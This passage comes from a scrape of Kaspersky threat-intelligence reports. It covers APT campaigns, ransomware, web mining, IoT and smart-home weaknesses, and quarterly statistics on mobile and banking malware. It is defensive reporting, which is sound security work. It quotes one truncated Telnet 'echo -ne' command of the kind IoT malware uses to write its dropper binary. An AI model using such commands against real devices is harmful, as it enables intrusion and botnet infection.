authors, Topinambour is an alternative name for the Jerusalem artichoke. Some of the changes the threat actor has made are intended to help it evade detection. For example, the C2 infrastructure uses IP addresses that appear to mimic ordinary LAN addresses. Further, the malware is almost completely 'fileless': the final stage of infection, an encrypted Trojan for remote administration, is embedded into the computer's registry for the malware to access when ready. The two KopiLuwak analogues \u2013 the.NET RocketMan Trojan and the PowerShell MiamiBeach Trojan \u2013 are used for cyber-espionage. We think the threat actor deploys these versions when the computers of the targets are protected with security software capable of detecting KopiLuwak. All three implants are able to fingerprint targets, gather information on system and network adapters, steal files, and download and execute additional malware. MiamiBeach is also able to take screenshots. You can read more [here](<https://securelist.com/turla-renews-its-arsenal-with-topinambour/91687/>).\n\n### CloudAtlas uses new infection chain\n\n[Cloud Atlas](<https://securelist.com/recent-cloud-atlas-activity/92016/>) (aka Inception) has a long history of cyber-espionage operations targeting industries and government bodies. We first reported this group in 2014 and we have continued to track its activities. During the first half of this year, we identified campaigns focused on Russia, Central Asia and regions of Ukraine with ongoing military conflicts. Cloud Atlas hasn't changed its TTPs (Tactics, Techniques and Procedures) since 2018 and continues to rely on existing tactics and malware to compromise high value targets. The threat actor's Windows intrusion set still uses spear-phishing emails to target its victims: these are crafted with Office documents that use malicious remote templates \u2013 whitelisted per victim \u2013 hosted on remote servers. Previously, Cloud Atlas dropped its 'validator' implant, named PowerShower, directly, after exploiting the Microsoft Equation vulnerability (CVE-2017-11882) mixed with CVE-2018-0802. In recent months, we have seen a new infection chain, involving a polymorphic HTA, a new and polymorphic VBS implant aimed at executing PowerShower, and the Cloud Atlas second stage modular backdoor that we disclosed in 2014.\n\n### Dtrack banking malware discovered\n\nIn summer 2018, we discovered ATMDtrack, a piece of banking malware targeting banks in India. We used YARA and the Kaspersky Attribution Engine to try to uncover more information about this ATM malware; and we found more than 180 new malware samples of a spy tool that we now call Dtrack. All the Dtrack samples we initially found were dropped samples, as the real payload was encrypted with various droppers \u2013 we were able to find them because of the unique sequences shared by ATMDtrack and the Dtrack [memory dumps](<https://encyclopedia.kaspersky.com/glossary/dump/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>). Once we decrypted the final payload and used the Kaspersky Attribution Engine again, we saw similarities with the [DarkSeoul campaign](<https://unit42.paloaltonetworks.com/tdrop2-attacks-suggest-dark-seoul-attackers-return/>), dating back to 2013 and attributed to the Lazarus group. It seems that they reused part of their old code to attack the financial sector and research centers in India. Our telemetry indicates that the latest DTrack activity was detected in the beginning of September 2019. This is a good example of how proper YARA rules and a solid working attribution engine can help to uncover connections with established malware families. In this case, we were able to add another family to the Lazarus group's arsenal: ATMDtrack and Dtrack. You can find our public report on Dtrack [here](<https://securelist.com/my-name-is-dtrack/93338/>).\n\n## Other security news\n\n### Sodin ransomware attacks MSP\n\nIn April, the Sodin ransomware (aka Sodinokibi and REvil) caught our attention, not least, because of the way it spread. The Trojan [exploited the CVE-2019-2725 vulnerability](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>) to execute a PowerShell command on a vulnerable Oracle WebLogic server, allowing the attackers to upload a dropper to the server, which then installed the ransomware payload. Patches for this vulnerability were released in April, but at the end of June, a similar vulnerability was discovered \u2013 CVE-2019-2729. Sodin also carried out [attacks on MSPs](<https://www.darkreading.com/attacks-breaches/attackers-exploit-msps-tools-to-distribute-ransomware/d/d-id/1335025>). In some cases, the attackers used the Webroot and Kaseya remote access consoles to deliver the Trojan. In others, [the attackers penetrated MSP infrastructure using an RDP connection](<https://www.reddit.com/r/msp/comments/c2wls0/kaseya_weaponized_to_deliver_sodinokibi_ransomware/>), elevated privileges, deactivated security solutions and backups and then downloaded the ransomware to client computers. This ransomware was also unusual because it didn't require the victim to carry out any action. Our statistics indicated that most victims were located in the Asia-Pacific region, including Taiwan, Hong Kong and South Korea.\n\nRansomware continues to be a major headache for consumers and businesses alike. Recovering data that a ransomware Trojan has encrypted is often impossible. However, in some cases we are able to do so. Recent examples include the [Yatron and FortuneCrypt malware](<https://securelist.com/ransomware-two-pieces-of-good-news/93355/>). If you ever face a situation where a ransomware Trojan has encrypted your data, and you don't have a backup, it's always worth checking the [No More Ransom](<https://www.nomoreransom.org/>) site, to see if a decryptor is available. You can find our decryptors for both of the above ransomware programs [here](<https://support.kaspersky.com/viruses/disinfection/10556>) and [here](<https://www.nomoreransom.org/en/decryption-tools.html>).\n\n### The impact of web mining\n\n[Malicious miners](<https://securelist.com/kaspersky-security-bulletin-2018-story-of-the-year-miners/89096/>) are programs designed to hijack the victim's CPU in order to mine crypto-currencies. The business model is simple: infect the computer, use the processing power of their [CPU](<https://en.wikipedia.org/wiki/Central_processing_unit>) or [GPU](<https://en.wikipedia.org/wiki/Graphics_processing_unit>) to generate coins and earn real-world money through legal exchanges and transactions. It's not obvious to the victim that they are infected \u2013 most people seldom use most of their computer's processing power and miners harness the 70-80% that is not being used for anything else. Miners can be installed along with adware, hacked games and other pirated content. However, there's also another model \u2013 using an embedded mining script that starts when the victim opens an infected web page. Where a corporate network has been infected, the CPU capacity available to the cybercriminals can be huge. But what impact does mining have? We recently tried to quantify the economic and environmental impact of web miners; and thereby evaluate the positive benefit of protecting against mining.\n\nThe total power saving can be calculated using the formula \u00b7N, where is the average value of the increase in power consumption of the victim's device during the web mining process, and N is the number of blocked attempts according to KSN ([Kaspersky Security Network](<https://www.kaspersky.com/ksn>)) data for 2018. This figure is equal to 18.8\u00b111.8 gigawatts (GW) \u2013 twice the average power consumption rate of all Bitcoin miners in the same year. To assess the amount of saved energy based on this power consumption rate, this number is multiplied by the average time that victim devices spend on web mining; that is, according to the formula '\u00b7N\u00b7t', where 't' is the average time that web miners would have been working had they not been blocked by our products. Since this value cannot be obtained from Kaspersky data, we used information from open sources provided by third-party researchers, according to which the estimated amount of electricity saved by users of our products ranges from 240 to 1,670 megawatt hours (MWh). Using the average prices for individual consumers, this amount of electricity could cost up to $200,000 for residents in North America or up to \u20ac250,000 for residents in Europe.\n\nYou can read our report [here](<https://securelist.com/electricity-and-mining/93292/>).\n\n### Mac OS threat landscape\n\nSome people still believe that there are no serious threats for Mac OS. There are certainly fewer threats than for Windows, mainly because more people run Windows, so there is a bigger pool of potential victims for attackers to target. However, as the number of people running Mac OS has grown, so have the number of threats targeting them.\n\nOur database currently contains 206,759 unique malicious and potentially unwanted files for Mac OS. From 2012 to 2017, the number of people facing attack grew year by year, reaching a peak in 2017, when we blocked attacks on around 255,000 computers running Mac OS. Since then, there has been a drop; and in the first half of 2019, we blocked around 87,000 attacks. The majority of threats for Mac OS in 2019 fell into the adware category \u2013 these threats are easier to create, offering a better return on investment for cybercriminals.\n\nThe number of phishing attacks targeting Mac OS has also increased year by year. During the first half of 2019, we detected nearly 6 million phishing attacks, 11.8% of which targeted corporate users. The countries facing the most phishing attacks were Brazil (30.87%), India (22.08%) and France (22.02%). The number of phishing attacks seeking to exploit the Apple brand name has also grown in recent years \u2013 by around 30-40% each year. In 2018, there were nearly 1.5 million such attacks; and in the first half of 2019 alone, the number exceeded 1.6 million \u2013 already an increase of 9% over the previous year.\n\nYou can read our report on the current Mac OS threat landscape [here](<https://securelist.com/threats-to-macos-users/93116/>).\n\n### Smart home vulnerabilities\n\nOne of our colleagues chose to turn his home into a smart home and installed a Fibaro Home Center system, so that he could remotely manage smart devices in the house, including lights, heating system, fridge, stereo system, sauna heater, smoke detectors, flood sensors, IP cameras and doorbell. He invited researchers from the [Kaspersky ICS CERT](<https://ics-cert.kaspersky.com/>) team to investigate it to see how secure it was. The researchers knew the model of the smart home hub and the IP address. They decided not to look at the Z-Wave protocol, which the smart home hub uses to talk to the appliances, because this required physical proximity to the house. They also discarded the idea of exploiting the programming language interpreter \u2013 the Fibaro hub used the patched version.\n\nOur researchers were able to find a remote SQL injection vulnerability, despite the efforts of Fibaro to avoid them, and a couple of remote code execution vulnerabilities in the PHP code. If exploited, these vulnerabilities would allow attackers to get root access rights on the smart hub, giving them full control over it. They also found a severe vulnerability in the Fibaro cloud that could allow an attacker to access all backups uploaded from Fibaro hubs around the world. This is how our research team acquired the backup data stored by the Fibaro Home Center located in this particular home. Among other things, this backup contains a database file with a lot of personal information, including the house's location, geo-location data from the owner's smartphone, the email address used to register with Fibaro, information about smart devices in the owner's home and even the owner's password. Credit to Fibaro Group not only for creating a rather secure product but also for working closely with our researchers to quickly patch the vulnerabilities we reported to them. You can read the full story [here](<https://securelist.com/fibaro-smart-home/91416/>).\n\n### Security of smart buildings\n\nThis quarter we also looked at the [security of automation systems in buildings](<https://securelist.com/smart-buildings-threats/93322/>) \u2013 sensors and controllers to manage elevators, ventilation, heating, lighting, electricity, water supply, video surveillance, alarm systems, fire extinguishing systems and more in industrial facilities. Such systems are used not only in office and residential buildings but also in hospitals, shopping malls, prisons, industrial production, public transport and other places where large work and/or living areas need to be controlled. We looked at the live threats to building-based automation systems to see what malware their owners encountered in the first six months of 2019.\n\nMost of the blocked threats were neither targeted, nor specific to building-based automation systems, but ordinary malware regularly found on corporate networks unrelated to automation systems. Such threats can still have a significant impact on the availability and integrity of automation systems, from file encryption (including databases) to denial of service on network equipment and workstations because of malicious traffic and unstable exploits. Spyware and backdoors pose a far greater threat, since stolen authentication data and the remote control it provides can be used to plan and carry out a subsequent targeted attack on a building's automation system.\n\n### Smart cars and connected devices\n\nKaspersky has investigated smart car security several times in recent years ([here](<https://securelist.com/mobile-apps-and-stealing-a-connected-car/77576/>) and [here](<https://securelist.com/a-study-of-car-sharing-apps/86948/>)), revealing a number of security issues. As vehicles become smarter and more connected they are also becoming more exposed. However, this doesn't just apply to smart cars and the apps that support them. There is now a whole industry of after-market devices designed to improve the driving experience \u2013 from car scanners to tuning gadgets. In a recent report, [we reviewed a number of automotive connected devices](<https://securelist.com/on-the-iot-road/91833/>) and reviewed their security setup. This exercise provided us with a first look at security issues in these devices. Our review included a couple of auto scanners, a dashboard camera, a GPS tracker, a smart alarm system and a pressure and temperature monitoring system.\n\nWe found the security of these devices more or less adequate, leaving aside minor issues. This is partly due to the limited device functionality and a lack of serious consequences in the event of a successful attack. It's also due to the vigilance of vendors. However, as we move towards a more and more connected future, it's important to remember that the smarter an object is the more attention should be paid to security in the development and updating of a device: careless development or an unpatched vulnerability could allow an attacker to hijack a victim's car or spy on an entire car fleet.\n\nWe continue to develop [KasperskyOS](<https://os.kaspersky.com/2019/05/20/kasperskyos-an-immune-based-approach-to-information-system-security/>), to help customers secure connected systems \u2013 including mobile devices and PCs, internet of things devices, intelligent energy systems, industrial systems, telecommunications systems and transportation systems.\n\nIf you're considering buying a device to make your car a little bit smarter, you should think about the security risks. Check to see if any vulnerabilities affect the device and whether it's possible to apply security updates to it. Don't automatically buy the most recently released product, since it might contain a security flaw that hasn't yet been discovered: the best choice is to buy a product that has already been updated several times. Finally, always consider the security of the 'mobile dimension' of the device, especially if you use an Android device: while applications make life easier, once a smartphone is hit by malware a lot can go wrong.\n\n### Personal data theft\n\nWe've become used to a steady stream of reports in the news about data breaches. Recent examples include the [theft of 23,205,290 email addresses](<https://www.forbes.com/sites/daveywinder/2019/08/05/cafepress-hacked-23m-accounts-compromised-is-yours-one-of-them/#625d70cf407e>) together with passwords weakly stored as base64 SHA-1 encoded hashes from CafePress. Worryingly, the hack was reported by [Have I Been Pwned](<https://haveibeenpwned.com>) \u2013 CafePress didn't notify its customers until some months after the breach had occurred.\n\nIn August, two Israeli [researchers discovered fingerprints, facial recognition data and other personal information from the Suprema Biostar 2 biometric access control system in a publicly accessible database](<https://www.theguardian.com/technology/2019/aug/14/major-breach-found-in-biometrics-system-used-by-banks-uk-police-and-defence-firms>). The exposure of biometric data is of particular concern. If a hacker is able to obtain my password, I can change it, but a biometric is for life.\n\n[Facebook has faced criticism on several occasions for failing to handle customers' data properly](<https://www.kaspersky.com/blog/facebook-10-fails/26980/>). In the latest of a long list of incidents, hundreds of millions of [phone numbers linked to Facebook accounts were found online](<https://techcrunch.com/2019/09/04/facebook-phone-numbers-exposed/?guccounter=1>) on a server that wasn't protected with a password. Each record contained a unique Facebook ID and the phone number listed on the account, leaving affected Facebook customers open to spam calls and SIM-swap attacks.\n\nOn September 12, mobile gaming company [Zynga reported that some player account data may have been accessed illegally by 'outside hackers'](<https://www.scmagazine.com/home/security-news/the-word-is-out-zynga-was-breached/>). Subsequently, a hacker going by the name of Gnosticplayers claimed to have breached the player database of _Words With Friends_, as well as data from _Draw Something_ and the discontinued game _OMGPOP_, exposing the data of more than 200 million Android and iOS players. While Zynga spotted the breach and notified customers, it's worrying that passwords were stored in cleartext.\n\nConsumers have no direct control over the security of the personal data they disclose to online providers. However, we can limit the damage of a security breach at an online provider by ensuring that they create passwords that are unique and hard to guess, or use a password manager to do this for us. By making use of two-factor authentication, where offered by an online provider, we can further reduce the impact of any breach.\n\nIt's also worth bearing in mind that hacking the server of an online provider isn't the only way that cybercriminals can get their hands on passwords and other personal data. They also harvest data stored on a consumer's computer directly. This includes data stored in browsers, files from the hard disk, system data, account logins and more. Our data shows that 940,000 people were targeted by malware designed to steal such data in the first half of 2019. We would recommend using specialist software to store account passwords and bank card details, rather than relying on your browser. You can find out more about how cybercriminals target personal data on computers [here](<https://securelist.com/how-to-steal-a-million-of-your-data/91855/>).", "cvss3": {}, "published": "2019-11-29T10:00:12", "type": "securelist", "title": "IT threat evolution Q3 2019", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802", "CVE-2019-2725", "CVE-2019-2729"], "modified": "2019-11-29T10:00:12", "id": "SECURELIST:967D8B65D5D554FFB5B46411F654A78A", "href": "https://securelist.com/it-threat-evolution-q3-2019/95268/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-11-30T17:13:50", "description": "\n\n_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data. _\n\n## Q3 figures\n\nAccording to Kaspersky Security Network:\n\n * Kaspersky Lab solutions blocked 947,027,517 attacks launched from online resources located in 203 countries.\n * 246,695,333 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 305,315 users.\n * Ransomware attacks were registered on the computers of 259,867 unique users.\n * Our File Anti-Virus logged 239,177,356 unique malicious and potentially unwanted objects.\n * Kaspersky Lab products for mobile devices detected: \n * 1,305,015 malicious installation packages\n * 55,101 installation packages for mobile banking Trojans\n * 13,075 installation packages for mobile ransomware Trojans.\n\n## Mobile threats\n\n### Q3 events\n\nPerhaps the biggest news of the reporting period was the [Trojan-Banker.AndroidOS.Asacub](<https://securelist.com/the-rise-of-mobile-banker-asacub/87591/>) epidemic. It peaked in September when more than 250,000 unique users were attacked \u2013 and that only includes statistics for those with Kaspersky Lab's mobile products installed on their devices.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09145748/it-threat-evolution-q3-2018-statistics_01.png>)\n\n_Number of users attacked by the mobile banker Asacub in 2017 and 2018_\n\nThe scale of the attack involving Asacub by far surpasses the largest attacks we have previously observed while monitoring mobile threats. The Trojan's versions have sequential version numbers, suggesting the attacks were launched by just one threat actor. It's impossible to count the total number of affected users, but it would need to be in the tens of thousands to make such a massive malicious campaign profitable. \n\n### Mobile threat statistics\n\nIn Q3 2018, Kaspersky Lab detected **1,305,015** malicious installation packages, which is 439,229 less packages than in the previous quarter.\n\n_Number of detected malicious installation packages, Q3 2017 \u2013 Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09150155/it-threat-evolution-q3-2018-statistics_02.png>)\n\n#### Distribution of detected mobile apps by type\n\nAmong all the threats detected in Q3 2018, the lion's share belonged to potentially unwanted RiskTool apps (52.05%); compared to the previous quarter, their share decreased by 3.3 percentage points (p.p.). Members of the RiskTool.AndroidOS.SMSreg family contributed most to this.\n\n_Distribution of newly detected mobile apps by type, Q2 \u2013 Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/12081111/it-threat-evolution-q3-2018-statistics_03.png>)\n\nSecond place was occupied by Trojan-Dropper threats (22.57%), whose share increased by 9 p.p. Most files of this type belonged to the Trojan-Dropper.AndroidOS.Piom, Trojan-Dropper.AndroidOS.Wapnor and Trojan-Dropper.AndroidOS.Hqwar families.\n\nThe share of advertising apps continued to decrease and accounted for 6.44% of all detected threats (compared to 8.91% in Q2 2018).\n\nThe statistics show that the number of mobile financial threats has been rising throughout 2018, with the proportion of mobile banker Trojans increasing from 1.5% in Q1, to 4.38% of all detected threats in Q3.\n\n**TOP 20 mobile malware**\n\n| Verdicts* | %** \n---|---|--- \n1 | DangerousObject.Multi.Generic | 55.85 \n2 | Trojan.AndroidOS.Boogr.gsh | 11.39 \n3 | Trojan-Banker.AndroidOS.Asacub.a | 5.28 \n4 | Trojan-Banker.AndroidOS.Asacub.snt | 5.10 \n5 | Trojan.AndroidOS.Piom.toe | 3.23 \n6 | Trojan.AndroidOS.Dvmap.a | 3.12 \n7 | Trojan.AndroidOS.Triada.dl | 3.09 \n8 | Trojan-Dropper.AndroidOS.Tiny.d | 2.88 \n9 | Trojan-Dropper.AndroidOS.Lezok.p | 2.78 \n10 | Trojan.AndroidOS.Agent.rt | 2,74 \n11 | Trojan-Banker.AndroidOS.Asacub.ci | 2.62 \n12 | Trojan-Banker.AndroidOS.Asacub.cg | 2.51 \n13 | Trojan-Banker.AndroidOS.Asacub.ce | 2.29 \n14 | Trojan-Dropper.AndroidOS.Agent.ii | 1,77 \n15 | Trojan-Dropper.AndroidOS.Hqwar.bb | 1.75 \n16 | Trojan.AndroidOS.Agent.pac | 1.61 \n17 | Trojan-Dropper.AndroidOS.Hqwar.ba | 1.59 \n18 | Exploit.AndroidOS.Lotoor.be | 1.55 \n19 | Trojan.AndroidOS.Piom.uwp | 1.48 \n20 | Trojan.AndroidOS.Piom.udo | 1.36 \n \n_* This malware rating does not include potentially dangerous or unwanted programs such as RiskTool or adware._ \n_** Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked._\n\nFirst place in our TOP 20 once again went to DangerousObject.Multi.Generic (55.85%), the verdict we use for malware that's detected [using cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies work when antivirus databases do not yet contain the data to detect a malicious program but the company's cloud antivirus database already includes information about the object. This is basically how the very latest malicious programs are detected.\n\nIn second place was Trojan.AndroidOS.Boogr.gsh (11.39%). This verdict is given to files that our system recognizes as malicious based on [machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>)..\n\nThird and fourth places went to representatives of the Asacub mobile banker family \u2013 Trojan-Banker.AndroidOS.Asacub.a (5.28%) and Trojan-Banker.AndroidOS.Asacub.snt (5.10%).\n\n#### Geography of mobile threats\n\n_Map of attempted infections using mobile malware, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151353/it-threat-evolution-q3-2018-statistics_04_en.png>)\n\n**TOP 10 countries by share of users attacked by mobile malware:**\n\n| Country* | %** \n---|---|--- \n1 | Bangladesh | 35.91 \n2 | Nigeria | 28.54 \n3 | Iran | 28.07 \n4 | Tanzania | 28.03 \n5 | China | 25.61 \n6 | India | 25.25 \n7 | Pakistan | 25.08 \n8 | Indonesia | 25.02 \n9 | Philippines | 23.07 \n10 | Algeria | 22.88 \n| | \n \n_* Countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000) are excluded._ \n_** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nIn Q3 2018, Bangladesh (35.91%) retained first place in terms of the share of mobile users attacked. Nigeria (28.54%) came second. Third and fourth places were claimed by Iran (28.07%) and Tanzania (28.03%) respectively.\n\n### Mobile banking Trojans\n\nDuring the reporting period, we detected **55,101** installation packages for mobile banking Trojans, which is nearly 6,000 fewer than in Q2 2018. \n\nThe largest contribution was made by Trojans belonging to the family Trojan-Banker.AndroidOS.Hqwar.jck \u2013 this verdict was given to 35% of all detected banking Trojans. Trojan-Banker.AndroidOS.Asacub came second, accounting for 29%.\n\n_Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q3 2017 \u2013 Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09150645/it-threat-evolution-q3-2018-statistics_05.png>)\n\n| Verdicts | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.a | 33.27 \n2 | Trojan-Banker.AndroidOS.Asacub.snt | 32.16 \n3 | Trojan-Banker.AndroidOS.Asacub.ci | 16.51 \n4 | Trojan-Banker.AndroidOS.Asacub.cg | 15.84 \n5 | Trojan-Banker.AndroidOS.Asacub.ce | 14.46 \n6 | Trojan-Banker.AndroidOS.Asacub.cd | 6.66 \n7 | Trojan-Banker.AndroidOS.Svpeng.q | 3.25 \n8 | Trojan-Banker.AndroidOS.Asacub.cf | 2.07 \n9 | Trojan-Banker.AndroidOS.Asacub.bz | 1.68 \n10 | Trojan-Banker.AndroidOS.Asacub.bw | 1.68 \n \n_* Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked by banking threats._\n\nIn Q3 2018, the TOP 10 rating of banking threats was almost exclusively (nine places out of 10) occupied by various versions of Trojan-Banker.AndroidOS.Asacub.\n\n_Geography of mobile banking threats, Q3 2018 _ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151425/it-threat-evolution-q3-2018-statistics_06_en.png>)\n\n**TOP 10 countries by share of users attacked by mobile banking Trojans:**\n\n| Country* | %** \n---|---|--- \n1 | Russia | 2.18 \n2 | South Africa | 2.16 \n3 | Malaysia | 0.53 \n4 | Ukraine | 0.41 \n5 | Australia | 0.39 \n6 | China | 0.35 \n7 | South Korea | 0.33 \n8 | Tajikistan | 0.30 \n9 | USA | 0.27 \n10 | Poland | 0.25 \n| | \n \n_* Countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (under 10,000) are excluded._ \n_** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nIn Q3 2018, Russia ended up in first place in this TOP 10 because of the mass attacks involving the Asacub Trojan. The USA, the previous quarter's leader, fell to ninth (0.27%) in Q3. Second and third place were occupied by South Africa (2.16%) and Malaysia (0.53%) respectively.\n\n### Mobile ransomware Trojans\n\nIn Q3 2018, we detected **13,075** installation packages for mobile ransomware Trojans, which is 1,044 fewer than in Q2.\n\n_Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab, Q3 2017 \u2013 Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09150710/it-threat-evolution-q3-2018-statistics_07.png>)\n\n| Verdicts | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Svpeng.ag | 47.79 \n2 | Trojan-Ransom.AndroidOS.Svpeng.ah | 26.55 \n3 | Trojan-Ransom.AndroidOS.Zebt.a | 6.71 \n4 | Trojan-Ransom.AndroidOS.Fusob.h | 6.23 \n5 | Trojan-Ransom.AndroidOS.Rkor.g | 5.50 \n6 | Trojan-Ransom.AndroidOS.Svpeng.snt | 3.38 \n7 | Trojan-Ransom.AndroidOS.Svpeng.ab | 2.15 \n8 | Trojan-Ransom.AndroidOS.Egat.d | 1.94 \n9 | Trojan-Ransom.AndroidOS.Small.as | 1.43 \n10 | Trojan-Ransom.AndroidOS.Small.cj | 1.23 \n \n_* Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab's mobile antivirus attacked by ransomware Trojans._\n\nIn Q3 2018, the most widespread mobile ransomware Trojans belonged to the Svpeng family \u2013 Trojan-Ransom.AndroidOS.Svpeng.ag (47.79%) and Trojan-Ransom.AndroidOS.Svpeng.ah (26.55%). Together, they accounted for three quarters of all mobile ransomware Trojan attacks. The once-popular families Zebt and Fusob were a distant third and fourth, represented by Trojan-Ransom.AndroidOS.Zebt.a (6.71%) and Trojan-Ransom.AndroidOS.Fusob.h (6.23%) respectively.\n\n_Geography of mobile ransomware Trojans, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151458/it-threat-evolution-q3-2018-statistics_08_en.png>)\n\n**TOP 10 countries by share of users attacked by mobile ransomware Trojans:**\n\n| Country* | %** \n---|---|--- \n1 | USA | 1.73 \n2 | Kazakhstan | 0.36 \n3 | China | 0.14 \n4 | Italy | 0.12 \n5 | Iran | 0.11 \n6 | Belgium | 0.10 \n7 | Switzerland | 0.09 \n8 | Poland | 0.09 \n9 | Mexico | 0.09 \n10 | Romania | 0.08 \n \n_* Countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (under 10,000) are excluded._ \n_** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nJust like in Q2, first place in the TOP 10 went to the United States (1.73%). Kazakhstan (0.6%) rose one place to second in Q3, while China (0.14%) rose from seventh to third.\n\n## Attacks on IoT devices\n\nIn this quarter's report, we decided to only present the statistics for Telnet attacks, as this type of attack is used most frequently and employs the widest variety of malware types. \n \nTelnet | 99,4% \nSSH | 0,6% \n \n_The popularity of attacked services according to the number of unique IP addresses from which attacks were launched, Q3 2018_\n\n### Telnet attacks\n\n_Geography of IP addresses of devices from which attacks were attempted on Kaspersky Lab honeypots, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151529/it-threat-evolution-q3-2018-statistics_09_en.png>)\n\n**TOP 10 countries hosting devices that were sources of attacks targeting Kaspersky Lab honeypots.**\n\n| Country | %* \n---|---|--- \n1 | China | 27.15% \n2 | Brazil | 10.57% \n3 | Russia | 7.87% \n4 | Egypt | 7.43% \n5 | USA | 4.47% \n6 | South Korea | 3.57% \n7 | India | 2.59% \n8 | Taiwan | 2.17% \n9 | Turkey | 1.82% \n10 | Italy | 1.75% \n \n_* Infected devices in each country as a percentage of the global number of IoT devices that attack via Telnet._\n\nIn Q3, China (23.15%) became the leader in terms of the number of unique IP addresses directing attacks against Kaspersky Lab honeypots. Brazil (10.57%) came second, after leading the rating in Q2. Russia (7.87%) was third.\n\nSuccessful Telnet attacks saw the threat actors download Downloader.Linux.NyaDrop.b (62.24%) most often. This piece of malware is remarkable in that it contains a shell code that downloads other malware from the same source computer that has just infected the victim IoT device. The shell code doesn't require any utilities \u2013 it performs all the necessary actions within itself using system calls. In other words, NyaDrop is a kind of universal soldier, capable of performing its tasks irrespective of the environment it has been launched in.\n\nIt was the Trojans of the family Backdoor.Linux.Hajime that downloaded NyaDrop most frequently, because this is a very convenient self-propagation method for Hajime. The flow chart in this case is of particular interest:\n\n 1. After successfully infecting a device, Hajime scans the network to find new victims.\n 2. As soon as a suitable device is found, the lightweight NyaDrop (just 480 bytes) is downloaded to it.\n 3. NyaDrop contacts the device that was the infection source and slowly downloads Hajime, which is much larger.\n\nAll these actions are only required because it's quite a challenge to download files via Telnet, though it is possible to execute commands. For example, this is what creating a NyaDrop file looks like:\n \n \n echo -ne \"\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\n\n480 bytes can be sent this way, but sending 60 KB becomes problematic.\n\n**TOP 10 malware downloaded to infected IoT devices in successful Telnet attacks**\n\n| Verdicts | %* \n---|---|--- \n1 | Trojan-Downloader.Linux.NyaDrop.b | 62.24% \n2 | Backdoor.Linux.Mirai.ba | 16.31% \n3 | Backdoor.Linux.Mirai.b | 12.01% \n4 | Trojan-Downloader.Shell.Agent.p | 1.53% \n5 | Backdoor.Linux.Mirai.c | 1.33% \n6 | Backdoor.Linux.Gafgyt.ay | 1.15% \n7 | Backdoor.Linux.Mirai.au | 0.83% \n8 | Backdoor.Linux.Gafgyt.bj | 0.61% \n9 | Trojan-Downloader.Linux.Mirai.d | 0.51% \n10 | Backdoor.Linux.Mirai.bj | 0.37% \n \n_* Proportion of downloads of each specific malicious program to IoT devices in successful Telnet attacks as a percentage of all malware downloads in such attacks._\n\nThe rating did not differ much from the previous quarter: half the top 10 is occupied by different modifications of Mirai, which is the most widespread IoT malware program to date.\n\n## Financial threats\n\n### Q3 events\n\nThe banking Trojan DanaBot that was detected in Q2 continued to develop rapidly in Q3. A new modification included not only an updated C&amp;C/bot communication protocol but also an extended list of organizations targeted by the malware. Its prime targets in Q2 were located in Australia and Poland, but in Q3 organizations from Austria, Germany and Italy were also included.\n\nTo recap, DanaBot has a modular structure and is capable of loading extra modules to intercept traffic and steal passwords and crypto wallets. The Trojan spread via spam messages containing a malicious office document, which subsequently loaded the Trojan's main body.\n\n### Financial threat statistics\n\nIn Q3 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 305,315 users.\n\n_Number of unique users attacked by financial malware, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151555/it-threat-evolution-q3-2018-statistics_10_en.png>)\n\n#### Geography of attacks\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, we calculated the share of users of Kaspersky Lab products in each country that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of banking malware attacks, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151629/it-threat-evolution-q3-2018-statistics_11_en.png>)\n\n**TOP 10 countries by percentage of attacked users**\n\n| Country* | %** \n---|---|--- \n1 | Germany | 3.0 \n2 | South Korea | 2.8 \n3 | Greece | 2.3 \n4 | Malaysia | 2.1 \n5 | Serbia | 2.0 \n6 | United Arab Emirates | 1.9 \n7 | Portugal | 1.9 \n8 | Lithuania | 1.9 \n9 | Indonesia | 1.8 \n10 